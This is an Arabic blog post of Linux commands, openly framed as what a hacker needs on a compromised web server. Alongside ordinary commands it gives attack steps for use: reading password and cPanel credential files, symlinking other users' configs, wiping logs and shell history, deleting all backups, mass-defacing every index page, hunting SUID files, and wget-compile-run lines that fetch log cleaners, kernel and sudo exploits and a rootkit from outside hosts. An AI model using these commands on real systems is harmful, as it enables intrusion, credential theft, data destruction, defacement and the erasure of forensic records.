الخميس، 8 نوفمبر 2018

جميع اوامر ( Linux )‏


















  • جميع اوامر ( Linux )‏



  • :32::32::32::32::32::32:
  • بسم الله الرحمن الرحيم


  • اغلب الاوامر التى يحتاجها الهكر فى النظام للتعامل معه


  • cat /etc/passwd | cut -d ":" -f1


  • 1- أمر إظهار يوزرات المواقع :
  • ls -la /etc/valiases
  • او
  • cat /etc/passwd
  • او
  • ls /var/mail
  • او
  • cat /etc/shadow
  • او
  • cat /etc/domainalias


  • :32::32::32::32::32::32::32::32:

  • ln -s / etc/passwd w
  • يسحب لك الملف بملف أسمه w


  • rm angel.php <------لحذف ملف
  • rm -r angel<------ لحذف مجلد
  • find angel.php <------لعمل بحث عن ملف
  • find *.php <------لعمل بحث عن جميع الملفات بهذا الامتداد
  • -----------------------------------------

  • أمر التأكد من صلاحية سحب الملفات علي السيرفر
  • which xxxx <------ بدل العلامات بأمر السحب
  • xxxx = أمر السحب
  • اومر السحب
  • wget
  • curl -o
  • get
  • lynx -source
  • ------------------------------------


  • هذا االامر الي معي حلو يخليك ما تمشور مشوار .... هذا يطلعلك الملفات الي داخل مجلد boot
  • تقدر تغيير مجلد boot الى
  • ----------------------------------------------


  • كود:
  • cd /boot;ls -al
  • etc << لفحص بعض الملفات ومنها قد تجد ثغرة confixx
  • usr << لمعرفة برامج السيرفر
  • opt < بعض السيرفرات تلقاه بالمجلد الرئيسي بعضها لا

  • --------------------------------------------



  • last -20 -a : عرض آخر 20 اسم تم تسجيل دخولهم
  • ps -ax : عرض الـ Processess
  • lsmod : الـ modules الموجوده في الكيرنال
  • uname -a : لعرض معلومات الكرنال
  • اوامر بسيطه
  • mv : تغيير الإسم
  • cp : نسخ ملف
  • cp -R : نسخ مجلد
  • ln : إنشاء رابط ( link ) لملف
  • gerp : البحث داخل ملف

  • -----------------------------------


  • لو اردت معرفة هل البورت مفتوح11457 راح اطبق التالي :
  • netstat -an|grep 11457

  • ---------------------------------------------


  • امر للتاكد من وجود ملف

  • كود:
  • ls file
  • حلو بدل ما تكتب ls ويطلع لك ملفات وتخش عيونك على بعض
  • ويمكن تستخدمه للتاكد من وجوده ومعرفه التصريح
  • كود:
  • ls -al file

  • ------------------------------------------------

  • أوامر إحترافيه :
  • 1- إظهار اليوزرات بشكل مرتب :
  • awk -F: '{ print $1 }' / etc/passwd | sort

  • 2- معرفة البرامج المستخدمه من قبل اليوزر والرووت ( من ضمنها اسم برنامج الاف تي بي )
  • ps -o "%u : %U : %p : %a"

  • 3- معلومات كامله واحترافيه عن ال processess مع تحديد اليوزر المستخدم للبروسيس
  • ps -eo pid,tt,user,fname,tmout,f,wchan

  • 4- ال processess ليوزر معين ؟ ( استبدل user فقط في هذا الأمر )
  • ps -U user -u user -N

  • 5- اليوزرز المتصلين الآن
  • users

  • 6- عرض آخر اليوزرز اللي دخلو :
  • last

  • 7- لجلب معلومات عن مستخدم معين ( استبدل user في هذا الأمر )
  • finger user

  • 8- امر معرفة اسماء اليوزرز المتصلين بالسيرفر .. وافعالهم
  • w

  • 9- عرض البورتات المفتوحه
  • netstat -lnp --ip

  • -------------------------------------------


  • touch angel.php ينشئ لك ملف ضمن المجلد
  • ++g : كومبيلر لل C++ و C
  • gcc : كومبيلر لل C++ و C
  • grep : يستخدم للبحث عن شئ داخل ملف
  • gzip : لضغط ملفات
  • gunzip : لضغط ملفات
  • وال un لفك الضغط بالاستعانه مع الاوامر اللي فوق مثال : ungzip unzip
  • haltsys : لاغلاق النظام
  • cat : لعرض محتوى اكثر من ملف مع بعض
  • cd : لتغير الدليل الذي انت عليه
  • chmod : لتغير تصريح دخلول ملف معين
  • chown : لتغير مالك ملف معين
  • clear : لمسح كل الذي على الشاشة
  • cmp : لمقارنة ملفين
  • cp : لنسخ الملفات
  • crypt : لتشفير و فك تشفير الملفات
  • csplit : لتقسيم الملف الى عدة ملفات
  • cu : لطلب تريمنال يونكس اخر
  • whoami يقول لك من انت (يعني من انا ) يقول لك root او مستخدم xxx
  • rm : لمسح ملفات او مجلدات ( خاليه )
  • rmdir : لمسح مجلد ( خالي )
  • وفي حال كنت بالترمنال اضغط على زر التاب Tap يعرض لك كل اوامر اللينكس
  • ومثلاً اي امر تحب تعرف شو هووا فقط اكتب الأمر وبعدها هيلب :
  • مثال rm --help

  • --------------------------------------------------

  • أوامر رائعه :
  • لمعرفة جميع ملفات اسم مستخدم معين ( استبدل john )
  • find /home -user john

  • لمعرفة الملفات اللتي تم تعديلها في خلال الـ 24 ساعه ( أمر مهم )
  • find $HOME -mtime 0

  • لمعرفة المساحه المستخدمه
  • df -h
  • لمعرفة المساحه المتبقيه
  • du

  • -----------------------------------------

  • وهذي مجموعة من الأوامر البسيطة
  • ls -m
  • يظهر الملفات مع تفريقهم بفواصل بدلا من تفريقهم بخانات
  • ls -t
  • يظهر الملفات حسب تواريخ إنشائها يعني من الجديد إلى القديم
  • ls -lu
  • يظهر الملفات حسب آخر تاريخ زيارة لهذه الملفات (مع تبيين هذا التاريخ)
  • ls -F
  • يظهر الملفات بأنواعها حيث :
  • الملفات المسبوقة ب / عبارة عن مجلدات
  • الملفات المسبوقة ب * عبارة عن ملفات تنفيذية
  • الملفات المسبوقة ب @ عبارة عن روابط
  • ls -S
  • يظهر الملفات تسلسليا من الأكبر إلى الأصغر
  • ls -X
  • يظهر الملفات ويرتبها حسب امتدادها
  • ls -r
  • يظهر الملفات مرتبة بالمقلوب (يعني من z ثم y ثم x ....)
  • cp
  • لنسخ ملف أو مجلد
  • mkdir
  • لإنشاء مجلد
  • mv
  • لتحويل ملف من مجلد إلى مجلد أو إعادة تسميته
  • (مثلا
  • mv angel gnom
  • راح يعيد تسميت المجلد angel إلى gnom
  • أو
  • mv angel.php /ho me/hackteach/publi c_htm l/cc/test
  • راح يحول الملف angel.php من المجلد إلي هو فيه إلى المجلد الجديد test)

  • ---------------------------------------


  • ln -sf / home / user / public_html / vb / in clude s / c onfig . php conf.txt
  • راح يجيب لك نسخـة من ملف الكونفق تبع اليوزر المحدد في الملف الجديد conf.txt
  • بالعربي ,, الأمر هذا هو حق السم لينك ,, symLink

  • ---------------------------------------
  • أمر لمعرفة اليوزر اللي مستهلك أكبر مساحه :
  • du -s / home | sort -rn
  • ( بدون مسافه بعد / و home )
  • -----------------------------------

  • النسخ واللصق بهالطريقة
  • c p /ho me/hi.t xt /ho me/jack
  • أو العكس


  • ----------------------------
  • لعمل ماس ديفاس بعد اخذ الروت
  • كود PHP:
  • find / -name "index.*" -exec cp /t mp/index.htm


  • ----------------------------------------------
  • أمر إظهار باسوردات السي بانل ( في حالة كنت روت ) :
  • في أوامر كثيره .. بعضها :
  • find / -name service.pwd
  • او
  • cat / home/*/public_html/_vti_pvt/service.pwd

  • و

  • cat / var/cpanel/accounting.log
  • ( لاتنسى تحذف المسافات قبل var و home )


  • --------------------------------------------


  • 1- حذف ملفات اللوقو
  • rm -rf / tmp/logs
  • rm -rf $HISTFILE
  • rm -rf / root/.ksh_history
  • rm -rf / root/.bash_history
  • rm -rf / root/.ksh_history
  • rm -rf / root/.bash_logout
  • rm -rf / usr/local/apache/logs
  • rm -rf / usr/local/apache/log
  • rm -rf / var/apache/logs
  • rm -rf / var/apache/log
  • rm -rf / var/run/utmp
  • rm -rf / var/logs
  • rm -rf / var/log
  • rm -rf / var/adm
  • rm -rf / etc/wtmp
  • rm -rf / etc/utmp
  • find / -name *.bash_history -exec rm -rf {} \;
  • find / -name *.bash_logout -exec rm -rf {} \;
  • find / -name "log*" -exec rm -rf {} \;
  • find / -name *.log -exec rm -rf {} \;

  • -------------------------------------------------


  • 2- أمر تعديل ملفات اللوقو ( إخفائها .. آمن )
  • cat / dev/null > / var/log/kdebug
  • cat / dev/null > / var/log/kernel
  • cat / dev/null > / var/log/maillog
  • cat / dev/null > / var/log/messages
  • cat / dev/null > / var/log/secure
  • cat / dev/null > / var/log/svclog
  • cat / dev/null > / var/log/tcdebuglog
  • cat / dev/null > / var/log/tclient
  • cat / dev/null > / var/log/tivoLog.prv
  • cat / dev/null > / var/log/tivoLog.pub
  • cat / dev/null > / var/log/tivoweb.log
  • cat / dev/null > / var/log/tvdebuglog
  • cat / dev/null > / var/log/tverr
  • cat / dev/null > / var/log/tvlog
  • 3- أمر قرائة ملف الكونفيج على السيرفر
  • cat / usr/local/apache/conf/httpd.conf
  • 4- أمر عرض الملفات Suid ( ملفات من قبل الروت لكن يستطيع اليوزر تشغيلها )
  • find / -type f -perm -04000 -ls

  • -------------------------------------------------

  • 5- أمر عرض الملفات Sgid ( ملفات من قبل الروت لكن تستطيع المجموعه تشغيلها )
  • find / -type f -perm -02000 -ls
  • 6- أوامر عرض المجلدات المصرح لها تصريح 777
  • find / -perm -2 -ls
  • find / -type d -perm 0777 | xargs ls -alld
  • find / -type d -pem -2 -ls
  • 7- أمر حذف جميع الباك آب الموجوده على السيرفر
  • find / -name "cpbackup*" -exec rm {} ;
  • find / -name "backup*" -exec rm {} ;
  • 8- أمر إستبدال جميع الإندكسات إلى الإندكس الموجود على المسار الحالي
  • find / -name "index.*" -exec cp index.htm {} ;
  • find / -name "default.*" -exec cp index.htm {} ;
  • 9- أمر تعديل صلاحيات الإندكسات إلى nobody ( لكي لا يشك اليوزر )
  • find / -name "index.*" -exec chown 99 index.html {} ;
  • find / -name "default.*" -exec chown 99 index.html {} ;
  • 10- أمر عرض System log
  • cat / etc/syslog.conf
  • 11- أمر عرض معلومات عن الذاكره
  • cat / proc/meminfo
  • 12- أمر تعديل دوال php والسيف مود وغيرها
  • pico / usr/local/lib/php.ini
  • 13- أمر عرض البورتات المفتوحه
  • netstat -atup | grep IST
  • 14- أمر عرض آخر إتصال
  • lastlog
  • 15- أمر عرض اليوزرات المتصله
  • w

  • --------------------------------------------------

  • 16- أمر لمعرفة إصدار الكيرنال
  • dpkg --list | grep linux-image
  • rpm -q kernel : kernel-2.6.18-53.1.4.el5
  • uname -s : SunOS
  • uname -r : 2.6.22-14-EL5
  • uname -mrsn : Linux s.server.com 2.6.18-53.1.4.el5 x86_64
  • cat / proc/version : Linux version 2.6.18-53.1.4.el5 (b@redhat.com) (gcc version 4.1.2 20070626 (Red Hat 4.1.2-14)) #1 SMP Wed Nov 14 1027 EST 2007
  • 17- أمر إيقاف process معين عن العمل
  • kill -9 PID
  • kill PID
  • مع إستبدال PID لرقم البروسيس .. تستطيع معرفته عن طريق الأمر
  • ps ux
  • ps aux
  • top
  • 18- أمر عرض الأوامر ( او بالأصح الملفات التنفيذيه ) اللتي عليها Suid ( يستطيع اليوزر تشغيلها )
  • find / bin / usr/bin / usr/local/bin / sbin / usr/sbin / usr/local/sbin -perm -4000 2> / dev/null
  • 19- أمر عرض اليوزرات اللتي لا تحتوي على باسورد
  • cut -d: -f1,2,3 / etc/passwd | grep 

  • ---------------------------------------------------------------


  • 20- أمر عرض الملفات اللتي تريد الكتابه عليها في مجلد etc
  • find / etc/ -type f -perm -o+w 2> / dev/null
  • 21- أمر عرض أوامر السحب المفعله كـ wget
  • which wget curl w3m lynx
  • 22- أمر عرض معلومات عن المعالج CPUINFO
  • cat / proc/version / proc/cpuinfo
  • 23- أمر عرض مساحات الهاردسك
  • du
  • ( ملاحظه : تستطيع إستخدامه مع option اخرى .. لاحظ الأوامر التاليه )
  • du -s / home/user | sort -rn
  • df -Th
  • 24- أمر التأكد من وجود المترجم gcc
  • locate gcc
  • 25- أمر إستخدام Wipelogs ( للتعديل على الوقو .. أمن )
  • wget http://www.packetstormsecurity.org/U...-wipers/zap2.c | gcc zap2.c -o zap2 | ./zap2
  • 26- أمر تنفيذ بعض الهجمات على الكيرنال
  • wget http://ftp.powernet.com.tr/supermail/debug/k3 | ./k3 1 | ./k3 2 | ./k3 3 | ./k3 4 | ./k3 5
  • 27- إستخدام ثغرة stack overflow عن طريق sudo
  • wget http://precision-gaming.com/sudo.c | gcc sudo.c -o sudosploit | ./sudosploit
  • 28- أمر تثبيت روت كت لإصدار 2.6
  • wget http://twofaced.org/linux2-6-all.c | gcc linux2-6-all.c -o linuxkernel | ./linuxkernel
  • 29- أمر استخدام سكربت Mig LogCleaner
  • wget http://twofaced.org/mig-logcleaner.c | gcc -DLINUX -WALL mig-logcleaner.c -o migl | ./migl -u root 0
  • 30- أمر لمعرفة الملفات والمجلدات اللتي تم تعديلها في خلال X يوم
  • find / -mtime x
  • ( ملاحظه : استبدل time إلى min للبحث في الدقائق .. ليصلح mmin )
  • 31- أمر لمعرفة الملفات والمجلدات اللتي تم تعديل خصائصها ( كـ الملكيه ) في خلال X يوم
  • find / -ctime x
  • 32- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر تنفيذها
  • find / -perm +4000 -user root
  • 33- للبحث عن الملفات اللتي مالكها root لكن يستطيع اليوزر الكتابه عليها
  • find / -perm +002 -user root
  • 34- للبحث عن الملفات اللتي ليس لديها مالك
  • find / -nouser
  • 35- للبحث عن الملفات اللتي مالكها هو اليوزر root
  • find / -user root
  • 36- من الأوامر التفصيليه لـ find
  • find / -name "*.txt" -size +10k -user root -not -perm +o=r -exec chmod o+r {} \;
  • شرح الأمر :
  • ابحث في جميع المجلدات .. عن اي ملف نصي امتداده txt
  • وحجمه أكثر من 10 كيلو بايت .. وصاحبه اليوزر root
  • وغير قابله للقراءه من اي يوزر اخر ماعدا مالكها الأصلي
  • يستطيع صاحبها قرائتها وويستطيع تنفيذها ( execution ) ( ورمزه -r-xr--r-- )
في

ليست هناك تعليقات:

إرسال تعليق

الاشتراك في: تعليقات الرسالة (Atom)

جميع اوامر ( Linux )‏

جميع اوامر ( Linux )‏ بسم الله الرحمن الرحيم اغلب الاوامر التى يحتاجها الهكر فى النظام للتعامل معه cat ...

  • Mahmoud Salah Soltan
    سيرة ذاتية الاسم بالكامل: محمودصلاح سلطان بدر صديق تاريخ الولادة ومكان الولادة : 1\2\1997 مصر\سوهاج \جرجا من ال...
  • (بلا عنوان)
  • جميع اوامر ( Linux )‏
    جميع اوامر ( Linux )‏ بسم الله الرحمن الرحيم اغلب الاوامر التى يحتاجها الهكر فى النظام للتعامل معه cat ...